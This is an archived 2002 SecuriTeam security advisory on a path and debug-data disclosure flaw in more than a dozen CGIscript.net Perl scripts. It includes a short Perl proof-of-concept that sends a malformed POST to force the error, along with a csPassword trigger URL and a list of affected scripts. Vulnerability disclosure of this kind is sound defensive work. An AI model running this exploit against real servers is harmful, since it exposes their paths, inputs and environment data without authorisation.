[UNIX] More than Fourteen CGIscript.net Scripts Have Path Disclosure Vulnerability
From: support@securiteam.comDate: 05/19/02
- Previous message: support@securiteam.com: "[UNIX] OpenBSD File Descriptor Vulnerability (Additional Details)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 19 May 2002 21:51:33 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
More than Fourteen CGIscript.net Scripts Have Path Disclosure
Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.cgiscript.net/> CGIscript.net sells perl/cgi web scripts
developed by Mike Barone and Andy Angrick. In recent history, a number of
these scripts have been shown to have serious security vulnerabilities and
more problems are continuing to emerge. This plus the fact that the unique
"csScriptName.cgi" script names can be easily located with search engines
makes the scripts a prime target for attackers.
Most recently, it has been found that almost all the scripts will display
"debug" data on errors including server paths, form input, and environment
values. While this information by itself is not enough to compromise a
server or application, it makes it easier for an attacker to exploit other
problems that may exist on the server or with the application.
Additionally, because the scripts use the %in hash for both form input and
then later script or database data it may be possible to view sensitive
data by causing the script to generate an error at a specific point in the
programs execution.
DETAILS
Exploit:
Because many of the scripts use CGI.pm to process file uploads, causing
CGI.pm to die with an error would make the script to display the debug
data. One way to do this is to send an invalid POST request with something
like the following script:
#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);
The following scripts are will generate a "debug" error message when a
CGI.pm error occurs, including server paths, form input, and environment
values:
* csBanner.cgi
* csCreatePro.cgi
* CSDownload.cgi
* csFAQ.cgi
* CSFiler.cgi
* CSFileshare.cgi
* CSGrid.cgi
* CSIncludes.cgi
* CSMailto.cgi
* CSNews.cgi
* CSNews.cgi (pro version)
* CSRandomText.cgi
* CSUpload.cgi
Additional scripts can be caused to generate errors in other ways.
csPassword for example, displays when you make a request for:
csPassword.cgi?command=remove
This calls a function that, while referenced by the program, does not
exist and subsequently generates an error and displays the debug data.
Impact:
Because path disclosure alone is not particularly dangerous, this advisory
has been rated "LOW RISK". It is recommended, however, that users upgrade
to a new version of the script(s) as soon as possible that does not
disclose "debug" data on errors.
Solution:
Vendor has stated that because this issue is low risk they do not intend
to patch any programs right away but will include a patch in the next
major revision.
ADDITIONAL INFORMATION
The information has been provided by <mailto:stegus1@yahoo.com> Steve
Gustin.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] OpenBSD File Descriptor Vulnerability (Additional Details)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Re: Secure shared web hosting using MAC Framework
... run the web server and web users shell in a jail, ... Those rights should
have priority on any traditional unix file ... This directive allows you to disable certain functions
for security reasons. ... Web users and executed web scripts shouldn't be able to
read ... (FreeBSD-Security) - RE: Techniques for Vulneability discovery
... "Art & Science of Computer Security" to be published ... to run scripts
and nmap (swell..$2-4k to learn this ... hint hint, E&Y, hint hint.. ... How do
experts discover vulnerabilities in a ... (Vuln-Dev) - RE: Techniques for Vulneability discovery
... "Art & Science of Computer Security" to be published ... to run scripts
and nmap (swell..$2-4k to learn this ... hint hint, E&Y, hint hint.. ... How do
experts discover vulnerabilities in a ... (Security-Basics) - Re: Microsoft Strategic Technology Protection Program
... servers and workstations through GPOs. ... that it's impossible for users
to inadvertently execute worm scripts. ... and other security patches using startup
scripts written in JScript. ... (NT-Bugtraq) - [UNIX] cPanel mod_php suexec Taint Vulnerability
... Get your security news from a reliable source. ... There exists a security issue
in cPanel installed systems due to how ... a user is able to execute arbitrary code
... all PHP scripts are executed as the same user ... (Securiteam)
